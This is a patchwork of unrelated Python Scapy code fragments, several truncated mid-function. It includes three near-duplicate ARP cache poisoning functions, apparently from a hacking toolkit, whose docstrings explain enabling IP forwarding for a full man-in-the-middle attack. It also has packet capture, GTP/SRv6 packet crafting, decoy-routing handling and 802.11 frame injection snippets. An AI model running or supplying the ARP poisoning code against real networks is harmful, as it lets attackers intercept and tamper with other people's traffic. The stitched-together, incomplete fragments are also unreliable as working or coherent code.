def cmd_arpoison(t1, t2, verbose): """ARP cache poison""" conf.verb = False mac1 = getmacbyip(t1) mac2 = getmacbyip(t2) pkt1 = Ether(dst=mac1) / ARP(op="is-at", psrc=t2, pdst=t1, hwdst=mac1) pkt2 = Ether(dst=mac2) / ARP(op="is-at", psrc=t1, pdst=t2, hwdst=mac2) try: while 1: sendp(pkt1) sendp(pkt2) if verbose: pkt1.show2() pkt2.show2() else: print(pkt1.summary()) print(pkt2.summary()) time.sleep(1) except KeyboardInterrupt: pass
def cmd_arp_poison(victim1, victim2, iface, verbose): """Send ARP 'is-at' packets to each victim, poisoning their ARP tables for send the traffic to your system. Note: If you want a full working Man In The Middle attack, you need to enable the packet forwarding on your operating system to act like a router. You can do that using: # echo 1 > /proc/sys/net/ipv4/ip_forward Example: \b # habu.arpoison 192.168.0.1 192.168.0.77 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77 ... """ conf.verb = False if iface: iface = search_iface(iface) if iface: conf.iface = iface['name'] else: logging.error( 'Interface {} not found. Use habu.interfaces to show valid network interfaces' .format(iface)) return False mac1 = getmacbyip(victim1) mac2 = getmacbyip(victim2) pkt1 = Ether(dst=mac1) / ARP( op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1) pkt2 = Ether(dst=mac2) / ARP( op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2) try: while 1: sendp(pkt1) sendp(pkt2) if verbose: pkt1.show2() pkt2.show2() else: print(pkt1.summary()) print(pkt2.summary()) time.sleep(1) except KeyboardInterrupt: pass
def cmd_arp_poison(victim1, victim2, iface, verbose): """Send ARP 'is-at' packets to each victim, poisoning their ARP tables for send the traffic to your system. Note: If you want a full working Man In The Middle attack, you need to enable the packet forwarding on your operating system to act like a router. You can do that using: # echo 1 > /proc/sys/net/ipv4/ip_forward Example: \b # habu.arpoison 192.168.0.1 192.168.0.77 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77 ... """ conf.verb = False if iface: conf.iface = iface mac1 = getmacbyip(victim1) mac2 = getmacbyip(victim2) pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1) pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2) try: while 1: sendp(pkt1) sendp(pkt2) if verbose: pkt1.show2() pkt2.show2() else: print(pkt1.summary()) print(pkt2.summary()) time.sleep(1) except KeyboardInterrupt: pass
def pkt_callback(pkt): try: pkt = Ether(pkt) except Exception as e: self.exception(e) if pcap_writer is not None: pcap_writer.write(pkt) if print_summary: self.log(pkt.summary())
def main(): if len(sys.argv) < 2: print 'pass 2 arguments: <destination> "<message>"' exit(1) iface = "eth1" print "sending on interface %s" % (iface) pkt = Ether(src='00:15:5d:00:00:00', dst='00:15:5d:00:00:03') / IPv6( src="fc00::1", dst="fc00::4") / IPv6ExtHdrRouting( segleft=2, type=4, addresses=[ "fc00::4", "fc00::101", "fc00::100" ]) / UDP(sport=64515, dport=2152) / GTP_U_Header( TEID=32, Reserved=0, E=1) / dl_pdu_session( gtp_ext=133, QoSID=14) / IPv6( src="fc00::1", dst="fc00::2") / UDP( dport=80, sport=35000) / sys.argv[1] pkt.show2() pkt.summary() sendp(pkt, iface=iface, verbose=False)
def process_cpu_packet(packet): ''' Given packet from client switch, update table with sequence number offset. ''' # Validate packet p_str = str(packet) # 0-7 : preamble1 # 8 : reason # 9-16 : preamble2 # 17-20 : tag_value # 21- : data packet (TCP) if p_str[:8] != '\x00' * 8 or p_str[8] != '\xab' or p_str[ 9:17] != '\x00' * 8: vprint('Packet discarded') return ip_hdr = None tcp_hdr = None tag = 0 try: tag = struct.unpack('!I', p_str[17:21])[0] p = Ether(p_str[21:]) ip_hdr = p['IP'] tcp_hdr = p['TCP'] except Exception as e: vprint(e) return # Compute the difference diff = tag - tcp_hdr.seq # Don't reprocess packet seen_lock.acquire() if (ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport) in seen: seen_lock.release() vprint('already saw packet') return seen[(ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport)] = diff seen_lock.release() vprintf('initial seqNo: %d\ttag: %d\n' % (tcp_hdr.seq, tag)) vprint('Packet received') vprint(p.summary()) add_to_table(ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport, diff) # Send the packet back to the switch to forward new_p = p_str[:8] + '\xac' + p_str[21:] sendp(new_p, iface=args.interface, verbose=args.verbose)
try: while 1: r = select([f, s], [], [])[0] # frame from /dev/net/tun if f in r: # tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4 buf = os.read(f, 1526) eth_rcvd_frame = Ether(buf[4:]) if DEBUG: os.write(1, "Received from %s\n" % ifname) if VERB: os.write(1, "%s\n" % eth_rcvd_frame.summary()) # Prepare Dot11 frame for injection dot11_sent_frame = RadioTap() / Dot11( type="Data", FCfield="from-DS", addr1=eth_rcvd_frame.getlayer(Ether).dst, addr2=BSSID) # It doesn't seem possible to set tuntap interface MAC address # when we create it, so we set source MAC here if not HAS_SMAC: dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src else: dot11_sent_frame.addr3 = SMAC if WEP: dot11_sent_frame.FCfield |= 0x40
def handle_parse_covert(p_str): ''' Given string packet, read the covert destination and send it back to the switch. ''' ip_hdr = None tcp_hdr = None try: p = Ether(p_str[9:]) ip_hdr = p[IP] tcp_hdr = p[TCP] except Exception as e: vprint(e) # Don't reprocess packet params = (ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport) if params not in tcp_options: return vprint('Packet received') vprint(p.summary()) # Look up the covert destination's IP address payload = p[TCP].payload abs_addr = '' try: # Request line should be of the form # "GET http://www.example.com/ HTTP/1.1" abs_addr = str(payload).strip().split()[1] except Exception as e: vprint(e) return url = urlparse(abs_addr) covert_ip = '' try: covert_ip = socket.gethostbyname(url.hostname) except Exception as e: vprintf('Failed to lookup host %s:\n%s\n' % (url.hostname, e)) return covert_port = url.port if url.port is not None else DEFAULT_PORT # Update dict with info k = (covert_ip, covert_port, args.switch_addr, tcp_hdr.sport) seqack_base_lock.acquire() if k in seqack_base: seqack_base_lock.release() return seqack_base[k] = (tcp_hdr.seq, tcp_hdr.ack, ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport) seqack_base_lock.release() vprint('Decoded covert %s:%d' % (covert_ip, covert_port)) update_decoy_mapping_table(ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport, covert_ip, covert_port) # Send packet back to switch. Use hacky solution to avoid reprocessing # this packet. new_p = p_str[:8] + '\x00' + p_str[9:] sendp(new_p, iface=args.interface, verbose=args.verbose) # Create the initial SYN packet for the connection to the covert # destination and send it back to the switch. covert_syn = Ether(src=args.switch_mac) covert_syn = covert_syn / IP(src=args.switch_addr, dst=covert_ip) covert_syn = covert_syn / TCP(sport=tcp_hdr.sport, dport=covert_port, flags=SYN_FLAGS, options=tcp_options[params], seq=tcp_hdr.seq) sendp(covert_syn, iface=args.interface, verbose=args.verbose)
try: while 1: r = select([f,s],[],[])[0] # frame from /dev/net/tun if f in r: # tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4 buf = os.read(f,1526) eth_rcvd_frame=Ether(buf[4:]) if DEBUG: os.write(1,"Received from %s\n" % ifname) if VERB: os.write(1,"%s\n" % eth_rcvd_frame.summary()) # Prepare Dot11 frame for injection dot11_sent_frame = RadioTap()/Dot11( type = "Data", FCfield = "from-DS", addr1 = eth_rcvd_frame.getlayer(Ether).dst, addr2 = BSSID) # It doesn't seem possible to set tuntap interface MAC address # when we create it, so we set source MAC here if not HAS_SMAC: dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src else: dot11_sent_frame.addr3 = SMAC if WEP: dot11_sent_frame.FCfield |= 0x40